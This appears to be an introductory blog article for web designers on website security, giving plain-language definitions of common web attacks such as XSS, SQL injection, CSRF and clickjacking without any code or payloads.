If you’re designing a website for yourself or a client, you’re going to need to check several boxes before launching it into the world. Some of those boxes are the fun ones–coming up with the color scheme, determining the page layout, and choosing creative graphics. But there’s one checkbox that, for many of us, is a bit of a downer: website security (cue sad trombone).
Website security isn’t the sexiest topic out there, but it’s critical knowledge for anyone serious about web design. Securing your website is like getting insurance on a house or car. It’s not exactly thrilling, but it’s well worth it to prevent a valuable asset from getting broken into or damaged.
In this article, we’ll go over the nuts and bolts of website security, including the types of threats you should know and the steps you need to take to secure a website.
Your comprehensive guide to website security
What is website security?
In simple terms, website security is the practice of protecting your website from online attacks. These attacks include unauthorized access, modification, disruption, or destruction of your site.
The people behind these attacks are known as hackers. Typically, their goal is to use your site as a vehicle to access online data like contact information, personal details and passwords, and credit card information.
From a business perspective, this not only compromises the integrity of your brand, but it also puts customers and clients at risk. Take it from the well-known trading app Robinhood–just last November, their customer support system was hacked to expose the email addresses, names, and phone numbers of 7 million users.
Types of web security threats you should know
Hackers have a lot of tools in their toolkit, so it’s helpful to have a broad understanding of the different types so that you can better protect your website. Here are some of the most common types of attacks.
Cross-site scripting (XSS): This type of attack exploits the trust that a user has in a particular site. It begins when a hacker sends malicious code through a website to unsuspecting users. This tricks the user’s browser into accepting the code, allowing the hacker to access the user’s cookies, session tokens, and any sensitive personal information they’d shared with the site.
SQL injection: The attacker injects a specific type of code (called SQL code) into a website to exploit a security vulnerability. This allows them to spoof identify, access and tamper with existing data, destroy the data altogether, and become administrators of the database server.
Cross-site request forgery (CSRF): This type of attack involves sending a request to the user that appears to come from the website–like asking them to change their email address or password or click a button on a form. The innocent user might carry out the action unintentionally, allowing the attacker to infiltrate the site. The lesson? While trust is great for relationships, it shouldn’t be given out freely when it comes to websites.
Denial of service (DoS): This attack shuts down a network so that it’s inaccessible to its users. It does this by flooding the website with traffic or sending it information that triggers a crash. The result is that legitimate users, such as employees or account holders, no longer have access to the site. This typically doesn’t involve the theft of data, but it does cause customers to lose trust in a business and can be expensive for the business to recover.
File inclusion: You’re probably familiar with websites that allow you to upload files to a server. As it turns out, that convenience comes with a price: vulnerability to file inclusion attacks. If a website isn’t properly secured, attackers can exploit user files as an avenue for infiltrating the site. This gives them access to user data and provides them with a way to run their own code.
Clickjacking: The attacker conceals hyperlinks beneath legitimate clickable content. When a user clicks seemingly innocuous content (such as a Submit button on a website), they are unwittingly routed to a dodgy URL. This technique can be used to capture sensitive user data, such as login credentials.
Directory traversal: This HTTP attack allows hackers to access restricted directories and execute malicious commands. As a result, attackers gain access to sensitive parts of the web server file system.
Command injection: A malicious user exploits a vulnerable application and executes arbitrary system commands on the host’s operating system. The commands can then be executed with the privileges of the hijacked application.